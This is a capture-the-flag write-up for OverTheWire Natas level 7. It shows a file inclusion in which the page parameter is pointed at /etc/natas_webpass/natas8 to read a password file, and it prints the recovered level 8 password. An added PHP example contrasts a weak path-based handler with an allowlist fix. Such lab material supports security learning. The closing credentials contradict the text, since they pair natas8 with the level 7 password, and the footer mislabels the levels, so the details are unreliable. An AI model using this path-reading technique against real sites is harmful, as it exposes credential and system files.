Natas - Level 7 Writeup

In this level we are given a front end with two pages. Observe the URL as you navigate through the pages.


Now let us look at the source code of the homepage for some further clarification:


<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
		<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
		<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
		<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>

this is the front page

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 --></div>
</body>
</html>

Since the hint says that the password is at /etc/natas_webpass/natas8, all we have to do is substitute

/index.php?page=home

with

/index.php?page=/etc/natas_webpass/natas8

revealing the password for level 8: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
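
Why the substitution works, and how a handler avoids it, as an added example that is not from the original post or the level's source. The two handlers, the file names and the secret are constructed for illustration; the weak one treats the `page` value as a filesystem path (so the absolute path is read), while the hardened one treats it only as a key into an allowlist (so the same input is rejected).

```php
<?php
// Added example: hypothetical handlers, not the natas7 source.
// Constructed sample files stand in for the site's pages and the secret file.
$base = sys_get_temp_dir() . '/page_demo_' . uniqid();
mkdir("$base/pages", 0700, true);
file_put_contents("$base/pages/home", "this is the front page\n");
file_put_contents("$base/pages/about", "this is the about page\n");
file_put_contents("$base/secret", "CONSTRUCTED-SECRET\n");

// Weak pattern: the request value is used as a filesystem path as-is, so an
// absolute path is read exactly like a page name.
function render_weak(string $page, string $pagesDir): string
{
    $old = getcwd();
    chdir($pagesDir);                      // page names resolve relative to here
    $out = @file_get_contents($page);
    chdir($old);
    return $out === false ? "not found\n" : $out;
}

// Hardened pattern: the request value is only a key into a fixed allowlist
// and never becomes part of a path.
function render_hardened(string $page, string $pagesDir): string
{
    $allowed = ['home' => 'home', 'about' => 'about'];
    if (!isset($allowed[$page])) {
        return "not found\n";
    }
    return file_get_contents("$pagesDir/{$allowed[$page]}");
}

// Same three requests against both handlers.
foreach (['home', 'about', "$base/secret"] as $page) {
    echo "page=$page\n";
    echo '  weak:     ', render_weak($page, "$base/pages");
    echo '  hardened: ', render_hardened($page, "$base/pages");
}

// Remove the constructed files again.
array_map('unlink', ["$base/pages/home", "$base/pages/about", "$base/secret"]);
rmdir("$base/pages");
rmdir($base);
```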


Access Level 8 with the following credentials:

Username: natas8
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL: http://natas8.natas.labs.overthewire.org/

Follow the next post for NATAS 7 Write Up

NATAS 8
